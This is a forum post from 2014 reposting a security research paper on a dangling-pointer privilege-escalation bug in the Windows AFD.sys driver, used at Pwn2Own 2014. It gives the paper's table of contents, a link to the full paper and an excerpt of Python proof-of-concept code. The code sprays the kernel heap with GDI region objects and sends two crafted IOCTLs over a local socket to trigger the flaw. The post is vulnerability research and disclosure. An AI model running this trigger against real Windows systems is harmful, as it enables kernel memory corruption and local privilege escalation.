Nytro Posted July 18, 2014 Report Posted July 18, 2014 AFD.SYS DANGLING POINTER VULNERABILITYTABLE OF CONTENTSAffected OS ......................................................................................................................................................................... 2Overview ............................................................................................................................................................................. 2Impact ................................................................................................................................................................................. 2Technical Analysis ............................................................................................................................................................... 3POC code ......................................................................................................................................................................... 3Vulnerability Analysis ...................................................................................................................................................... 4Step 1 - IOCTL 0x1207f ................................................................................................................................................ 5Step 2 - IOCTL 0x120c3 ............................................................................................................................................... 8Exploitation ..................................................................................................................................................................... 9READ-/WRITE-Primitives through WorkerFactory Objects ....................................................................................... 10Controlled Data on NonPagedPoolNx Pool ............................................................................................................... 11Leak Target ............................................................................................................................................................... 12Single-Gadget-ROP for SMEP Evasion ....................................................................................................................... 12Shellcode ................................................................................................................................................................... 13Putting it all together ................................................................................................................................................ 13Patch Analysis ................................................................................................................................................................... 14[…]targetsize = 0x100virtaddress = 0x13371337mdlsize = (pow(2, 0x0c) * (targetsize - 0x30) / 8) - 0xfff - (virtaddress & 0xfff)IOCALL = windll.ntdll.ZwDeviceIoControlFiledef I(val):return pack("<I", val)inbuf1 = I(0)*6 + I(virtaddress) + I(mdlsize) + I(0)*2 + I(1) + I(0)inbuf2 = I(1) + I(0xaaaaaaa) + I(0)*4[…]print "[+] creating socket..."sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, [1]socket.IPPROTO_TCP, None, 0, 0)if sock == -1:print "[-] no luck creating socket!"sys.exit(1)print "[+] got sock 0x%x" % sockaddr = sockaddr_in()addr.sin_family = socket.AF_INETaddr.sin_port = socket.htons(135)addr.sin_addr = socket.htonl(0x7f000001)connect(sock, byref(addr), sizeof(addr)) [2]print "[+] sock connected."print "[+] fill kernel heap"rgnarr = []nBottomRect = 0x2aaaaaawhile(1):hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1) [3]if hrgn == 0:breakrgnarr.append(hrgn)print ".",print "\n[+] GO!"IOCALL(sock,None,None,None,byref(IoStatusBlock), [4]0x1207f, inbuf1, 0x30, "whatever", 0x0)IOCALL(sock,None,None,None,byref(IoStatusBlock), [5]0x120c3, inbuf2, 0x18, "whatever", 0x0)print "[+] after second IOCTL! this should not be hit!"Download: http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf Quote
